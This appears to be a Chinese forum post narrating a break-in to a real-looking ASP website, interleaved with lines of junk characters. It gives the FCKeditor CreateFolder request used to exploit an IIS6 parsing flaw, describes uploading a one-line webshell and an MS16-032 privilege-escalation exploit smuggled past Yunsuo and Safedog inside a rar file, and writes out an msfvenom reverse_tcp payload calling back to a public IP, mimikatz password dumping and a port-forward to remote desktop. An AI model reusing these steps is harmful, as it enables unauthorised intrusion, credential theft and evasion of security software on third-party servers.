|
( P3 I. n% \9 ]. d+ F
9 i9 f/ w, D$ F/ M. A 8 a2 e: x o& R8 {& j0 Q- I
8 n9 n. R& V7 Q | ) Y0 Q2 I+ h8 z/ x# z* B: G. |/ o
0 [3 W* t# I% N& |* ~3 L3 P
0 B) B& t$ X6 S
一、 利用getwebshell篇
& j8 v" F% d, U% t; l
8 M3 {! r2 T8 ~2 q首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
4 D* G; s( K* y( M/ y: k1 r
9 g6 ]8 z' \0 @0 J# K* q# Y3 X# O
; o3 j$ |/ S" a; q下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
! W, g! n7 Y: z5 m+ Q
! D5 e0 W6 u' y* }
下面我们构造一个asp目录,如: - u# G; w7 b9 U, T% V4 q8 I& y7 z) i
+ l) c# n+ k0 D$ V5 \, [
) t6 P) Z+ Q9 }; c http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 % p3 Z, t1 C& c1 X
4 [: n8 v2 W' T6 s* A( G! O7 a2 D
! s2 G# Z6 S2 p* z; v' @1 q 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
z7 z a w/ Y1 A, `6 I0 I
3 K8 N/ u; ^, y: W% _0 B一、 绕过安全狗云锁提权并且加账号
2 B+ l3 f3 [* H/ e
3 u0 w4 X: ]3 g: \5 k, A! s; m0 ]+ w
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
) O8 h# T1 g& N' x' P. l% ^% U
! s- R7 M, u8 S2 f5 }如图:
6 ?: R8 D4 p' _5 X6 v
) E) G) v4 i6 m# f+ D' S' K {
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
6 l d9 z2 C* C6 U7 E* V
4 g9 L( @/ H) o4 c4 m一、 利用metasploit
" O7 j& l6 W2 Z3 \3 }# `
0 p! f" k3 V, G; Y首先用pentestbox生成一个64位的payload如下命令
v" o1 R* b( O+ y) C
8 [) o. @- T# w0 ^! j; ~msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
* g; H+ r; z. E; J$ v4 r
. o- a$ f. G- g' O/ ~
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
! W$ l1 m8 i9 Q2 p" E) T
( A" k' G1 t. K8 @3 n
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
4 i# P& B+ c! W$ k/ a+ w' _5 i
& D7 f8 ^/ I* U# o5 O下面我们来做一个监听如下命令:
5 f3 `6 E# c1 I m7 v$ v
- L( q: B- s* cportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
- L. S' @4 T) Y* D* ~/ m5 n
& ]4 E, [: x M' x
1 c( Y& [+ E8 w4 h. e) }& ^ | 2 {. G( Z1 w0 k6 d
3 O! W' L, c3 |. F . x7 T7 G" J& ]% t( `5 G0 k# v
$ O9 z6 Q$ J8 U q- [! P* }. I, `: B9 b8 ?9 \
+ \& {& p! j7 T) M, U
1 w! l# ]6 F7 C# R% Y
5 D) C& F! r; z0 m# i
, n6 L" }, ]7 O% j+ i/ E
$ q% u" _) K9 [/ b5 Z" w S6 C. @
4 E+ `$ J2 |% i Y' l: M) q$ v
" o1 ~* n4 E* |! m- M8 l/ @% Q
v5 X8 T& b2 @6 A
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06